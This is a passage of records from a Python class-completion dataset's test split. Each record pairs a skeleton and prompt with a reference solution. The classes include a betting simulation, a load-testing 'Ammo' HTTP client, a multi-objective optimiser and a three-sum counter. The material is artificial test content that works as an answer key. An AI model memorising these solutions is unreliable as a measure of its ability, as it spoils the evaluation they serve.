= np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n<|end_body_1|>\n\n<|body_start_2|>\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n<|end_body_2|>\n", "class_docstring": "this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user", "class_name": "Investment", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Investment:\n \"\"\"this class includes the functions and initialization method for the list of 
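[Editor's aside] The Solution record above gives three counting strategies for the same problem: a hash map over pairs, a sorted two-pointer scan, and value counting with binomial coefficients, where `(count[i] - 2) * (count[i] - 1) * count[i] // 6` is C(count[i], 3). A small brute-force cross-check that all three must agree with; the sample input and expected value 20 are the well-known LeetCode 923 example:

from itertools import combinations

def three_sum_multi_bruteforce(arr, target, mod=10 ** 9 + 7):
    """Count index triples i < j < k with arr[i] + arr[j] + arr[k] == target."""
    return sum(a + b + c == target for a, b, c in combinations(arr, 3)) % mod

arr, target = ([1, 1, 2, 2, 3, 3, 4, 4, 5, 5], 8)
assert three_sum_multi_bruteforce(arr, target) == 20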
positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n <|body_0|>\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n <|body_1|>\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n<|end_body_0|>\n\n<|body_start_1|>\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n<|end_body_1|>\n\n<|body_start_2|>\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000190", "length_bytes": 1888, "license_type": "no_license", "methods": [{"docstring": "Initializes the position list and number of simulations", "name": "__init__", "signature": "def __init__(self, positions, num_trials)"}, {"docstring": "generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1", "name": "generate_outcome", "signature": "def generate_outcome(self, pos_val)"}, {"docstring": "this function inputs a position value, and outputs a list of the return for each simulation (num_trials)", "name": "repeat_investment", "signature": "def repeat_investment(self, pos_val)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005848", "prompt": "Implement the Python class `Investment` described below.\n\nClass description:\nthis class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\n\nMethod signatures and docstrings:\n- def __init__(self, positions, num_trials): Initializes the position list and number of simulations\n- def generate_outcome(self, pos_val): generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\n- def repeat_investment(self, pos_val): this function inputs a position value, and outputs a list of the return for each simulation (num_trials)", "prompted_full_text": "Implement the Python class `Investment` described below.\n\nClass description:\nthis class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\n\nMethod signatures and docstrings:\n- def __init__(self, positions, num_trials): Initializes the position list and number of simulations\n- def generate_outcome(self, pos_val): generates the outcome of betting a total of $1000, given a position value ie. 
if the position value is 1, it generates the outcome of making 1000 bets of $1\n- def repeat_investment(self, pos_val): this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\n\n<|skeleton|>\nclass Investment:\n \"\"\"this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n <|body_0|>\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n <|body_1|>\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n<|end_body_0|>\n\n<|body_start_1|>\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n<|end_body_1|>\n\n<|body_start_2|>\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n<|end_body_2|>\n", "revision_id": "068db95cef0c693ad833fcfe968aa0b5db2162cd", "skeleton": "<|skeleton|>\nclass Investment:\n \"\"\"this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n <|body_0|>\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n <|body_1|>\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Investment:\n \"\"\"this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. 
if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n", "source": "the_stack_v2_python_sparse", "source_path": "neb330/Investment.py", "source_repo": "whirlkick/assignment8", "split": "test", "star_events_count": 0} {"blob_id": "a913e82b3e50378e503ca850344acc086be15245", "bodies": ["resp = None\nurl = '{}ammo/{}'.format(self.epoint, ammo_id)\ntry:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\nexcept Exception as e:\n panic(e=e, resp=resp)", "resp = None\ncodes_allowed = [201]\nurl = '{}ammo/'.format(self.epoint)\nkw = {'data': {}}\nif files:\n kw.update({'files': files})\nelif data:\n kw.update({'data': data})\nelse:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\nkw['data'].update({'case': case, 'descr': descr})\ntry:\n resp = requests.post(url, **kw)\nexcept Exception as e:\n panic(e=e, resp=resp)\nif resp.status_code not in codes_allowed:\n panic(resp=resp)\nreturn resp.json()"], "bodies_text": "<|body_start_0|>\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n<|end_body_0|>\n\n<|body_start_1|>\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Ammo", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Ammo:\n\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_0|>\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. 
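[Editor's aside] In the Investment record above, `generate_outcome` draws one uniform sample per bet and pays `2 * pos_val` when `x >= 0.51`, i.e. each bet wins with probability 0.49. The per-bet loop vectorizes naturally; a sketch with illustrative names, not a drop-in replacement for the record's methods:

import numpy as np

def simulate_day(position_value, bankroll=1000, win_prob=0.49, rng=None):
    """Payout for `bankroll` split into bankroll/position_value equal bets.

    Each bet pays 2 * position_value with probability win_prob, else 0,
    mirroring the record's while-loop without the per-bet Python iteration.
    """
    rng = rng or np.random.default_rng()
    num_bets = int(bankroll // position_value)
    wins = rng.random(num_bets) >= 1.0 - win_prob   # True with prob. win_prob
    return wins.sum() * 2 * position_value

rng = np.random.default_rng(0)
daily_returns = [simulate_day(10, rng=rng) / 1000.0 - 1 for _ in range(100)]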
Throws: LunaportClientError\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n<|end_body_0|>\n\n<|body_start_1|>\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000191", "length_bytes": 1984, "license_type": "permissive", "methods": [{"docstring": "Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError", "name": "ammo_get", "signature": "def ammo_get(self, ammo_id)"}, {"docstring": "Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError", "name": "ammo_post", "signature": "def ammo_post(self, case, descr=None, files=None, data=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004687", "prompt": "Implement the Python class `Ammo` described below.\n\nClass description:\nImplement the Ammo class.\n\nMethod signatures and docstrings:\n- def ammo_get(self, ammo_id): Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\n- def ammo_post(self, case, descr=None, files=None, data=None): Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError", "prompted_full_text": "Implement the Python class `Ammo` described below.\n\nClass description:\nImplement the Ammo class.\n\nMethod signatures and docstrings:\n- def ammo_get(self, ammo_id): Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\n- def ammo_post(self, case, descr=None, files=None, data=None): Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError\n\n<|skeleton|>\nclass Ammo:\n\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_0|>\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. 
Throws: LunaportClientError\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n<|end_body_0|>\n\n<|body_start_1|>\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n<|end_body_1|>\n", "revision_id": "d22cad17536fb8931bf69956e45299cde8c1b8db", "skeleton": "<|skeleton|>\nclass Ammo:\n\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_0|>\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Ammo:\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. 
Throws: LunaportClientError\"\"\"\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n", "source": "the_stack_v2_python_sparse", "source_path": "lunaport_client/mix_ammo.py", "source_repo": "maklaut/lunaport_client", "split": "test", "star_events_count": 0} {"blob_id": "57944741f0580df5d3dc537f7e1e1d655b51f054", "bodies": ["GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\nself.__theta_array = np.array([-np.inf], dtype=float)\nGradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\nself.__alpha_array = np.array([1], dtype=float)\nGradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)", "n, m = (p_list.shape[1], f_list.shape[1])\nindex_point = index_initial_point\nwhile not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\nreturn (p_list, f_list, self.__theta_array)", "self.update_stopping_condition_current_value('max_iter', 0)\nself._theta_tol = theta_tol\nself.__theta_array = np.array([-np.inf], dtype=float)\nself.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\nself.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\nself.__alpha_array = np.array([1], dtype=float)\nself.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])"], "bodies_text": 
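[Editor's aside] Both Ammo bodies above follow one requests pattern: pre-bind `resp = None`, issue the call, and funnel every failure (connection errors and, via `raise_for_status` or an explicit status-code check, non-2xx responses) through a shared `panic(e=..., resp=...)` helper; the record also preserves the source repo's original spellings such as "entrie" and "responce" verbatim. A condensed standalone sketch of the GET half; `BASE`, the timeout, and this `panic` are stand-ins, not the real client's definitions:

import requests

BASE = 'http://lunaport.example/api/'   # hypothetical endpoint

def panic(e=None, resp=None):
    raise RuntimeError('request failed: {} (resp={})'.format(e, resp))

def ammo_get(ammo_id, timeout=10):
    """GET one ammo entry as JSON, routing any failure through panic()."""
    resp = None
    try:
        resp = requests.get('{}ammo/{}'.format(BASE, ammo_id), timeout=timeout)
        resp.raise_for_status()          # turn 4xx/5xx into an exception
        return resp.json()
    except Exception as e:
        panic(e=e, resp=resp)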
"<|body_start_0|>\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n<|end_body_0|>\n\n<|body_start_1|>\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n<|end_body_1|>\n\n<|body_start_2|>\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n<|end_body_2|>\n", "class_docstring": "The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.", "class_name": "FMOPG", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FMOPG:\n \"\"\"The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def 
__init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n <|body_0|>\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n <|body_1|>\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n<|end_body_0|>\n\n<|body_start_1|>\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < 
self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n<|end_body_1|>\n\n<|body_start_2|>\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000192", "length_bytes": 8167, "license_type": "permissive", "methods": [{"docstring": "Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i", "name": "__init__", "signature": "def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None)"}, {"docstring": "Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. 
For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin", "name": "search", "signature": "def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None)"}, {"docstring": "Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.", "name": "reset_stopping_conditions_current_values", "signature": "def reset_stopping_conditions_current_values(self, theta_tol: float)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003131", "prompt": "Implement the Python class `FMOPG` described below.\n\nClass description:\nThe Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\n\nMethod signatures and docstrings:\n- def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None): Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to 